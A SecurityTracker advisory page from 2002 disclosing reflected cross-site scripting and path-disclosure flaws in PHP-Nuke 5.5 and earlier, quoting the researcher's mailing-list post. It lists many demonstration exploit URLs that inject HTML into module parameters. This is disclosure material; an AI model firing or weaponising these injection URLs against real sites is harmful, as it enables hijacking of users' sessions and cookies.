SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PHP-Nuke Vendors:   Phpnuke.org
More PHP-Nuke Input Filtering Bugs Let Remote Users Conduct Cross-Site Scripting Attacks Against Other Users
SecurityTracker Alert ID:  1004147
SecurityTracker URL:  http://securitytracker.com/id/1004147
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 25 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.5 and prior
Description:   Some more input filtering flaws were reported in PHP-Nuke. A remote user can conduct cross-site scripting attacks against PHP-Nuke users.

A remote user can create a specially crafted URL that, when loaded by the target (victim) user, will cause arbitrary code to be executed by the target user's browser. The code will appear to originate from the site running PHP-Nuke and will run in the security context of that site. As a result, the code will be able to access the target user's cookies associated with the site running PHP-Nuke and may be able to take certain actions acting as the target user.

The following demonstration exploit URLs have been provided:

http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E
http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75
http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge
http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload
http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here
http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%

Impact:   A remote user can create HTML that will cause arbitrary code to be executed on a target user's computer. The code will be able to access the target user's authentication cookies associated with the site running PHP-Nuke.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpnuke.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  More Cross site Scripting in PHPNuke


Cross site scripting is a serious problem, (even if some people
doesn't believe it), On this second round i'll show 8 new XSS
vulnerabilities in PHP Nuke (most of them are also path disclosure
vulns):

http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E
http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75
http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge
http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E


That in Addition to the 9 i mentioned last week on my posting to
vuln-dev:

http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload
http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here
http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E


I would like to mention that i couldn't find any contact information
on phpnuke's website (without registering as a user).



Best Regards

-- 
/*
Rodrigo Gutierrez                              +47 73546339
rodrigo@trustix.com			       +47 98060198
Trustix AS                           http://www.trustix.com
*/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC